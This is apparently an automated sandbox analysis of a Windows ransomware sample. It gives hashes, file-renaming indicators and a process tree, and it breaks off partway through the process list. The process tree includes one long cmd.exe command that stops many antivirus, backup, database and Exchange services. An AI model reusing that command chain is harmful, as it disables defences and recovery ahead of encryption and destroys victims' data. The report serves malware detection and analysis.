2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de

General

Target

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
Size

53KB
MD5

075fde76356266570e4801a1f0e852ae
SHA1

c6fa790f37e0a30b1c6cc9014fefc9164adc8a16
SHA256

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de
SHA512

4cff70eff3f0d4c6df0b05d6b6de916e86d0b8575858ef925932d27214756afce0cc5d621bb93934d24ee5aa4ee54a2fba808e4098d8beb360a1682d6b3ccee4

Score

8^/10

ransomware

Malware Config

Signatures

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\UnlockUninstall.png => C:\Users\Admin\Pictures\UnlockUninstall.png.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File renamed	C:\Users\Admin\Pictures\UpdateNew.raw => C:\Users\Admin\Pictures\UpdateNew.raw.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File opened for modification	C:\Users\Admin\Pictures\WaitFormat.tiff	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File renamed	C:\Users\Admin\Pictures\WaitFormat.tiff => C:\Users\Admin\Pictures\WaitFormat.tiff.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File renamed	C:\Users\Admin\Pictures\HideStop.tif => C:\Users\Admin\Pictures\HideStop.tif.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File renamed	C:\Users\Admin\Pictures\RedoGroup.png => C:\Users\Admin\Pictures\RedoGroup.png.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
File renamed	C:\Users\Admin\Pictures\StartProtect.tif => C:\Users\Admin\Pictures\StartProtect.tif.enc	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1064 cmd.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1612 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

824 PING.EXE

pid	process
1064	cmd.exe

pid	process
1612	taskkill.exe

pid	process
824	PING.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1440	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
Token: SeDebugPrivilege	1440	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
Token: SeDebugPrivilege	1612	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.execmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1440 wrote to memory of 1680	1440	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe	cmd.exe
PID 1440 wrote to memory of 1680	1440	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe	cmd.exe
PID 1440 wrote to memory of 1680	1440	2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe	cmd.exe
PID 1680 wrote to memory of 1128	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1128	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1128	1680	cmd.exe	net.exe
PID 1128 wrote to memory of 520	1128	net.exe	net1.exe
PID 1128 wrote to memory of 520	1128	net.exe	net1.exe
PID 1128 wrote to memory of 520	1128	net.exe	net1.exe
PID 1680 wrote to memory of 660	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 660	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 660	1680	cmd.exe	net.exe
PID 660 wrote to memory of 756	660	net.exe	net1.exe
PID 660 wrote to memory of 756	660	net.exe	net1.exe
PID 660 wrote to memory of 756	660	net.exe	net1.exe
PID 1680 wrote to memory of 688	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 688	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 688	1680	cmd.exe	net.exe
PID 688 wrote to memory of 288	688	net.exe	net1.exe
PID 688 wrote to memory of 288	688	net.exe	net1.exe
PID 688 wrote to memory of 288	688	net.exe	net1.exe
PID 1680 wrote to memory of 568	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 568	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 568	1680	cmd.exe	net.exe
PID 568 wrote to memory of 1472	568	net.exe	net1.exe
PID 568 wrote to memory of 1472	568	net.exe	net1.exe
PID 568 wrote to memory of 1472	568	net.exe	net1.exe
PID 1680 wrote to memory of 1688	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1688	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1688	1680	cmd.exe	net.exe
PID 1688 wrote to memory of 1412	1688	net.exe	net1.exe
PID 1688 wrote to memory of 1412	1688	net.exe	net1.exe
PID 1688 wrote to memory of 1412	1688	net.exe	net1.exe
PID 1680 wrote to memory of 1184	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1184	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1184	1680	cmd.exe	net.exe
PID 1184 wrote to memory of 512	1184	net.exe	net1.exe
PID 1184 wrote to memory of 512	1184	net.exe	net1.exe
PID 1184 wrote to memory of 512	1184	net.exe	net1.exe
PID 1680 wrote to memory of 1536	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1536	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1536	1680	cmd.exe	net.exe
PID 1536 wrote to memory of 676	1536	net.exe	net1.exe
PID 1536 wrote to memory of 676	1536	net.exe	net1.exe
PID 1536 wrote to memory of 676	1536	net.exe	net1.exe
PID 1680 wrote to memory of 1036	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1036	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1036	1680	cmd.exe	net.exe
PID 1036 wrote to memory of 1572	1036	net.exe	net1.exe
PID 1036 wrote to memory of 1572	1036	net.exe	net1.exe
PID 1036 wrote to memory of 1572	1036	net.exe	net1.exe
PID 1680 wrote to memory of 824	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 824	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 824	1680	cmd.exe	net.exe
PID 824 wrote to memory of 1624	824	net.exe	net1.exe
PID 824 wrote to memory of 1624	824	net.exe	net1.exe
PID 824 wrote to memory of 1624	824	net.exe	net1.exe
PID 1680 wrote to memory of 1700	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1700	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 1700	1680	cmd.exe	net.exe
PID 1700 wrote to memory of 1064	1700	net.exe	net1.exe
PID 1700 wrote to memory of 1064	1700	net.exe	net1.exe
PID 1700 wrote to memory of 1064	1700	net.exe	net1.exe
PID 1680 wrote to memory of 828	1680	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe
"C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe"
1⤵
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop Acronis VSS Provider /y & net stop Enterprise Client Service /y & net stop Sophos Agent /y & net stop Sophos AutoUpdate Service /y & net stop Sophos Clean Service /y & net stop Sophos Device Control Service /y & net stop Sophos File Scanner Service /y & net stop Sophos Health Service /y & net stop Sophos MCS Agent /y & net stop Sophos MCS Client /y & net stop Sophos Message Router /y & net stop Sophos SafeStore Service /y & net stop Sophos Protection System Service /y & net stop Sophos Web Control Service /y & net stop SQLsafe ?????????? ??????????? ?????? /y & net stop SQLsafe Filter Service /y & net stop Symantec System Recovery /y & net stop Veeam Backup Service Data Catalog /y & net stop AcronisAgent /y & net stop AcrSch2Svc /y & net stop Antivirus /y & net stop ARSM /y & net stop BackupExecAgentAccelerator /y & net stop BackupExecAgentBrowser /y & net stop BackupExecDeviceMediaService /y & net stop BackupExecJobEngine /y & net stop BackupExecManagementService /y & net stop BackupExecRPCService /y & net stop BackupExecVSSProvider /y & net stop bedbg /y & net stop DCAgent /y & net stop EPSecurityService /y & net stop EPUpdateService /y & net stop EraserSvc11710 /y & net stop EsgShKernel /y & net stop FA_Scheduler /y & net stop IISAdmin /y & net stop IMAP4Svc /y & net stop macmnsvc /y & net stop masvc /y & net stop MBAMService /y & net stop MBEndpointAgent /y & net stop McAfeeEngineService /y & net stop McAfeeFramework /y & net stop McAfeeFrameworkMcAfeeFramework /y & net stop McShield /y & net stop McTaskManager /y & net stop mfemms /y & net stop mfevtp /y & net stop MMS /y & net stop mozyprobackup /y & net stop MsDtsServer /y & net stop MsDtsServer100 /y & net stop MsDtsServer110 /y & net stop MSExchangeES /y & net stop MSExchangeIS /y & net stop MSExchangeMGMT /y & net stop MSExchangeMTA /y & net stop MSExchangeSA /y & net stop MSExchangeSRS /y & net stop MSOLAP $ SQL_2008 /y & net stop MSOLAP $ SYSTEM_BGC /y & net stop MSOLAP $ TPS /y & net stop MSOLAP $ TPSAMA /y & net stop MSSQL $ BKUPEXEC /y & net stop MSSQL $ ECWDB2 /y & net stop MSSQL $ PRACTICEMGT /y & net stop MSSQL $ PRACTTICEBGC /y & net stop MSSQL $ PROFXENGAGEMENT /y & net stop MSSQL $ SBSMONITORING /y & net stop MSSQL $ SHAREPOINT /y & net stop MSSQL $ SQL_2008 /y & net stop MSSQL $ SYSTEM_BGC /y & net stop MSSQL $ TPS /y & net stop MSSQL $ TPSAMA /y & net stop MSSQL $ VEEAMSQL2008R2 /y & net stop MSSQL $ VEEAMSQL2012 /y & net stop MSSQLFDLauncher /y & net stop MSSQLFDLauncher $ PROFXENGAGEMENT /y & net stop MSSQLFDLauncher $ SBSMONITORING /y & net stop MSSQLFDLauncher $ SHAREPOINT /y & net stop MSSQLFDLauncher $ SQL_2008 /y & net stop MSSQLFDLauncher $ SYSTEM_BGC /y & net stop MSSQLFDLauncher $ TPS /y & net stop MSSQLFDLauncher $ TPSAMA /y & net stop MSSQLSERVER /y & net stop MSSQLServerADHelper100 /y & net stop MSSQLServerOLAPService /y & net stop MySQL80 /y & net stop MySQL57 /y & net stop ntrtscan /y & net stop OracleClientCache80 /y & net stop PDVFSService /y & net stop POP3SVC /y & net stop ReportServer /y & net stop ReportServer $ SQL_2008 /y & net stop ReportServer $ SYSTEM_BGC /y & net stop ReportServer $ TPS /y & net stop ReportServer $ TPSAMA /y & net stop RESVC /y & net stop sacsvr /y & net stop SamSs /y & net stop SAVAdminService /y & net stop ????????? /y & net stop SDRSVC /y & net stop SepMasterService /y & net stop ShMonitor /y & net stop Smcinst /y & net stop SmcService /y & net stop SMTPSVC /y & net stop SNAC /y & net stop SntpService /y & net stop sophossps /y & net stop SQLAgent $ BKUPEXEC /y & net stop SQLAgent $ ECWDB2 /y & net stop SQLAgent $ PRACTTICEBGC /y & net stop SQLAgent $ PRACTTICEMGT /y & net stop SQLAgent $ PROFXENGAGEMENT /y & net stop SQLAgent $ SBSMONITORING /y & net stop SQLAgent $ SHAREPOINT /y & net stop SQLAgent $ SQL_2008 /y & net stop SQLAgent $ SYSTEM_BGC /y & net stop SQLAgent $ TPS /y & net stop SQLAgent $ TPSAMA /y & net stop SQLAgent $ VEEAMSQL2008R2 /y & net stop SQLAgent $ VEEAMSQL2012 /y & net stop SQLBrowser /y & net stop SQLSafeOLRService /y & net stop SQLSERVERAGENT /y & net stop SQLTELEMETRY /y & net stop SQLTELEMETRY $ ECWDB2 /y & net stop SQLWriter /y & net stop SstpSvc /y & net stop svcGenericHost /y & net stop swi_filter /y & net stop swi_service /y & net stop swi_update_64 /y & net stop TmCCSF /y & net stop tmlisten /y & net stop TrueKey /y & net stop TrueKeyScheduler /y & net stop TrueKeyServiceHelper /y & net stop UI0Detect /y & net stop VeeamBackupSvc /y & net stop VeeamBrokerSvc /y & net stop VeeamCatalogSvc /y & net stop VeeamCloudSvc /y & net stop VeeamDeploymentService /y & net stop VeeamDeploySvc /y & net stop VeeamEnterpriseManagerSvc /y & net stop VeeamMountSvc /y & net stop VeeamNFSSvc /y & net stop VeeamRESTSvc /y & net stop VeeamTransportSvc /y & net stop W3svc /y & net stop wbengine /y & net stop WRSVC /y & net stop MSSQL $ VEEAMSQL2008R2 /y & net stop SQLAgent $ VEEAMSQL2008R2 /y & net stop VeeamHvIntegrationSvc /y & net stop swi_update /y & net stop SQLAgent $ CXDB /y & net stop SQLAgent $ CITRIX_METAFRAME /y & net stop SQL ???????? /y & net stop MSSQL $ PROD /y & net stop Zoolz 2 ?????? /y & net stop MSSQLServerADHelper /y & net stop SQLAgent $ PROD /y & net stop msftesql $ PROD /y & net stop NetMsmqActivator /y & net stop EhttpSrv /y & net stop ekrn /y & net stop ESHASRV /y & net stop MSSQL $ SOPHOS /y & net stop SQLAgent $ SOPHOS /y & net stop AVP /y & net stop klnagent /y & net stop MSSQL $ SQLEXPRESS /y & net stop SQLAgent $ /y & net stop SQLEXPRESS /y & net stop wbengine /y & net stop kavfsslp /y & net stop KAVFSGT /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\system32\net.exe
net stop Acronis VSS Provider /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Acronis VSS Provider /y
4⤵
PID:520

C:\Windows\system32\net.exe
net stop Enterprise Client Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Enterprise Client Service /y
4⤵
PID:756

C:\Windows\system32\net.exe
net stop Sophos Agent /y
3⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Agent /y
4⤵
PID:288

C:\Windows\system32\net.exe
net stop Sophos AutoUpdate Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos AutoUpdate Service /y
4⤵
PID:1472

C:\Windows\system32\net.exe
net stop Sophos Clean Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Clean Service /y
4⤵
PID:1412

C:\Windows\system32\net.exe
net stop Sophos Device Control Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Device Control Service /y
4⤵
PID:512

C:\Windows\system32\net.exe
net stop Sophos File Scanner Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos File Scanner Service /y
4⤵
PID:676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:420

C:\Windows\system32\net.exe
net stop Sophos Health Service /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Health Service /y
4⤵
PID:1572

C:\Windows\system32\net.exe
net stop Sophos MCS Agent /y
3⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos MCS Agent /y
4⤵
PID:1624

C:\Windows\system32\net.exe
net stop Sophos MCS Client /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos MCS Client /y
4⤵
PID:1064

C:\Windows\system32\net.exe
net stop Sophos Message Router /y
3⤵
PID:828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Message Router /y
4⤵
PID:1824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
4⤵
PID:1524

C:\Windows\system32\net.exe
net stop Sophos SafeStore Service /y
3⤵
PID:1560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos SafeStore Service /y
4⤵
PID:1916

C:\Windows\system32\net.exe
net stop Sophos Protection System Service /y
3⤵
PID:852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Protection System Service /y
4⤵
PID:1712

C:\Windows\system32\net.exe
net stop Sophos Web Control Service /y
3⤵
PID:1912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Sophos Web Control Service /y
4⤵
PID:856

C:\Windows\system32\net.exe
net stop SQLsafe ?????????? ??????????? ?????? /y
3⤵
PID:996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLsafe ?????????? ??????????? ?????? /y
4⤵
PID:1984

C:\Windows\system32\net.exe
net stop SQLsafe Filter Service /y
3⤵
PID:916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLsafe Filter Service /y
4⤵
PID:1148

C:\Windows\system32\net.exe
net stop Symantec System Recovery /y
3⤵
PID:1144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Symantec System Recovery /y
4⤵
PID:1760

C:\Windows\system32\net.exe
net stop Veeam Backup Service Data Catalog /y
3⤵
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Veeam Backup Service Data Catalog /y
4⤵
PID:1616

C:\Windows\system32\net.exe
net stop AcronisAgent /y
3⤵
PID:1612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:2028

C:\Windows\system32\net.exe
net stop AcrSch2Svc /y
3⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:576

C:\Windows\system32\net.exe
net stop Antivirus /y
3⤵
PID:1128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
4⤵
PID:1060

C:\Windows\system32\net.exe
net stop ARSM /y
3⤵
PID:660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
4⤵
PID:1288

C:\Windows\system32\net.exe
net stop BackupExecAgentAccelerator /y
3⤵
PID:688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:1244

C:\Windows\system32\net.exe
net stop BackupExecAgentBrowser /y
3⤵
PID:568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:1404

C:\Windows\system32\net.exe
net stop BackupExecDeviceMediaService /y
3⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
4⤵
PID:1564

C:\Windows\system32\net.exe
net stop BackupExecJobEngine /y
3⤵
PID:1184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:1840

C:\Windows\system32\net.exe
net stop BackupExecManagementService /y
3⤵
PID:1536

C:\Windows\system32\net.exe
net stop BackupExecRPCService /y
3⤵
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
4⤵
PID:1088

C:\Windows\system32\net.exe
net stop BackupExecVSSProvider /y
3⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4⤵
PID:1092

C:\Windows\system32\net.exe
net stop bedbg /y
3⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
4⤵
PID:1488

C:\Windows\system32\net.exe
net stop DCAgent /y
3⤵
PID:828

C:\Windows\system32\net.exe
net stop EPSecurityService /y
3⤵
PID:1560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
4⤵
PID:1080

C:\Windows\system32\net.exe
net stop EPUpdateService /y
3⤵
PID:1576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
4⤵
PID:1908

C:\Windows\system32\net.exe
net stop EraserSvc11710 /y
3⤵
PID:1980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
4⤵
PID:1520

C:\Windows\system32\net.exe
net stop EsgShKernel /y
3⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
4⤵
PID:1664

C:\Windows\system32\net.exe
net stop FA_Scheduler /y
3⤵
PID:980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
4⤵
PID:1736

C:\Windows\system32\net.exe
net stop IISAdmin /y
3⤵
PID:1892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
4⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ ECWDB2 /y
5⤵
PID:1892

C:\Windows\system32\net.exe
net stop IMAP4Svc /y
3⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
4⤵
PID:900

C:\Windows\system32\net.exe
net stop macmnsvc /y
3⤵
PID:1676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
4⤵
PID:1620

C:\Windows\system32\net.exe
net stop masvc /y
3⤵
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
4⤵
PID:1508

C:\Windows\system32\net.exe
net stop MBAMService /y
3⤵
PID:1660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
4⤵
PID:2028

C:\Windows\system32\net.exe
net stop MBEndpointAgent /y
3⤵
PID:1612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
4⤵
PID:1464

C:\Windows\system32\net.exe
net stop McAfeeEngineService /y
3⤵
PID:576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
4⤵
PID:1728

C:\Windows\system32\net.exe
net stop McAfeeFramework /y
3⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
4⤵
PID:1060

C:\Windows\system32\net.exe
net stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:1128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
4⤵
PID:1256

C:\Windows\system32\net.exe
net stop McShield /y
3⤵
PID:1288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
4⤵
PID:660

C:\Windows\system32\net.exe
net stop McTaskManager /y
3⤵
PID:920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
4⤵
PID:1244

C:\Windows\system32\net.exe
net stop mfemms /y
3⤵
PID:688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
4⤵
PID:1416

C:\Windows\system32\net.exe
net stop mfevtp /y
3⤵
PID:1404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
4⤵
PID:568

C:\Windows\system32\net.exe
net stop MMS /y
3⤵
PID:976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
4⤵
PID:1564

C:\Windows\system32\net.exe
net stop mozyprobackup /y
3⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
4⤵
PID:1904

C:\Windows\system32\net.exe
net stop MsDtsServer /y
3⤵
PID:1840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
4⤵
PID:1184

C:\Windows\system32\net.exe
net stop MsDtsServer100 /y
3⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
4⤵
PID:420

C:\Windows\system32\net.exe
net stop MsDtsServer110 /y
3⤵
PID:1536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
4⤵
PID:1692

C:\Windows\system32\net.exe
net stop MSExchangeES /y
3⤵
PID:1088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
4⤵
PID:1036

C:\Windows\system32\net.exe
net stop MSExchangeIS /y
3⤵
PID:1704

C:\Windows\system32\net.exe
net stop MSExchangeMGMT /y
3⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
4⤵
PID:1104

C:\Windows\system32\net.exe
net stop MSExchangeMTA /y
3⤵
PID:1488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
4⤵
PID:1700

C:\Windows\system32\net.exe
net stop MSExchangeSA /y
3⤵
PID:1532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
4⤵
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
5⤵
PID:1532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ PRACTTICEMGT /y
6⤵
PID:1524

C:\Windows\system32\net.exe
net stop MSExchangeSRS /y
3⤵
PID:828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
4⤵
PID:1712

C:\Windows\system32\net.exe
net stop MSOLAP $ SQL_2008 /y
3⤵
PID:1080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP $ SQL_2008 /y
4⤵
PID:1560

C:\Windows\system32\net.exe
net stop MSOLAP $ SYSTEM_BGC /y
3⤵
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP $ SYSTEM_BGC /y
4⤵
PID:1576

C:\Windows\system32\net.exe
net stop MSOLAP $ TPS /y
3⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP $ TPS /y
4⤵
PID:1980

C:\Windows\system32\net.exe
net stop MSOLAP $ TPSAMA /y
3⤵
PID:1664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP $ TPSAMA /y
4⤵
PID:1068

C:\Windows\system32\net.exe
net stop MSSQL $ BKUPEXEC /y
3⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ BKUPEXEC /y
4⤵
PID:980

C:\Windows\system32\net.exe
net stop MSSQL $ ECWDB2 /y
3⤵
PID:912

C:\Windows\system32\net.exe
net stop MSSQL $ PRACTICEMGT /y
3⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ PRACTICEMGT /y
4⤵
PID:1268

C:\Windows\system32\net.exe
net stop MSSQL $ PRACTTICEBGC /y
3⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ PRACTTICEBGC /y
4⤵
PID:1676

C:\Windows\system32\net.exe
net stop MSSQL $ PROFXENGAGEMENT /y
3⤵
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ PROFXENGAGEMENT /y
4⤵
PID:1616

C:\Windows\system32\net.exe
net stop MSSQL $ SBSMONITORING /y
3⤵
PID:2028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SBSMONITORING /y
4⤵
PID:1660

C:\Windows\system32\net.exe
net stop MSSQL $ SHAREPOINT /y
3⤵
PID:1464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SHAREPOINT /y
4⤵
PID:1612

C:\Windows\system32\net.exe
net stop MSSQL $ SQL_2008 /y
3⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SQL_2008 /y
4⤵
PID:576

C:\Windows\system32\net.exe
net stop MSSQL $ SYSTEM_BGC /y
3⤵
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SYSTEM_BGC /y
4⤵
PID:268

C:\Windows\system32\net.exe
net stop MSSQL $ TPS /y
3⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ TPS /y
4⤵
PID:1128

C:\Windows\system32\net.exe
net stop MSSQL $ TPSAMA /y
3⤵
PID:660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ TPSAMA /y
4⤵
PID:1288

C:\Windows\system32\net.exe
net stop MSSQL $ VEEAMSQL2008R2 /y
3⤵
PID:1244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y
4⤵
PID:920

C:\Windows\system32\net.exe
net stop MSSQL $ VEEAMSQL2012 /y
3⤵
PID:1416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2012 /y
4⤵
PID:688

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher /y
3⤵
PID:568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
4⤵
PID:1404

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ PROFXENGAGEMENT /y
3⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ PROFXENGAGEMENT /y
4⤵
PID:976

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ SBSMONITORING /y
3⤵
PID:1904

C:\Windows\system32\net1.exe
